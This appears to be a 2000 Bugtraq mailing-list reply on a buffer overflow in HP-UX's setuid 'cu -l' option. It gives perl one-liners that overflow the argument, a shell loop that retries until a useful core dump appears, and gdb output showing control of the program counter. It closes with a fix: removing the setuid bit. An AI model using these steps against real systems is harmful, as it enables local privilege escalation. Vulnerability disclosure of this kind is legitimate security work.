Bugtraq mailing list archives
Re: HPUX cu -l option buffer overflow vulnerabilit
From: "J.A. Gutierrez" <spd () GTC1 CPS UNIZAR ES>
Date: Wed, 8 Nov 2000 11:13:42 +0200
======================================================= HPUX cu -l option buffer overflow vulnerability ======================================================= Date: 02/11/2000 Tested on HP-UX B.11.00 $ cu -l `perl -e 'printf "A" x 9777'`
It's exploitable on 10.20 (trivial exploit: you don't even have to find return address, the buffer itself gets executed) HP-UX 9.x 68k seems to be vulnerable too, but I don't have the exploit. On HP-UX 11 you need PA-RISC 1.1 shell code, and the PC you get with ./cu -l `perl -e 'printf "A" x 5667'` changes randomly (why?). Eventually you get a pointer to your data: $ while : do ./cu -l `perl -e 'printf "A" x 5667'` if file core | egrep -v SIGILL then break fi done [...] Illegal instruction(coredump) Connect failed: Requested device/system name not known Illegal instruction(coredump) Memory fault(coredump) core: core file from 'cu' - received SIGSEGV $ gdb cu core [...] Core was generated by `cu'. Program terminated with signal 11, Segmentation fault. Unable to find __dld_flags symbol in object file. #0 0x7f7eb010 in ?? () #0 0x7f7eb010 in ?? () (gdb) print {char *} 0x7f7eb010 $1 = 0x41414141 <Address 0x41414141 out of bounds> (gdb) Fix: chmod -s /bin/cu -- finger spd () gtc1 cps unizar es for PGP / So be easy and free .mailcap tip of the day: / when you're drinking with me application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day text/x-vcard; cat '%s' > /dev/null / (the pogues)
Current thread:
- HPUX cu -l option buffer overflow vulnerabilit zorgon (Nov 03)
- Re: HPUX cu -l option buffer overflow vulnerabilit J.A. Gutierrez (Nov 09)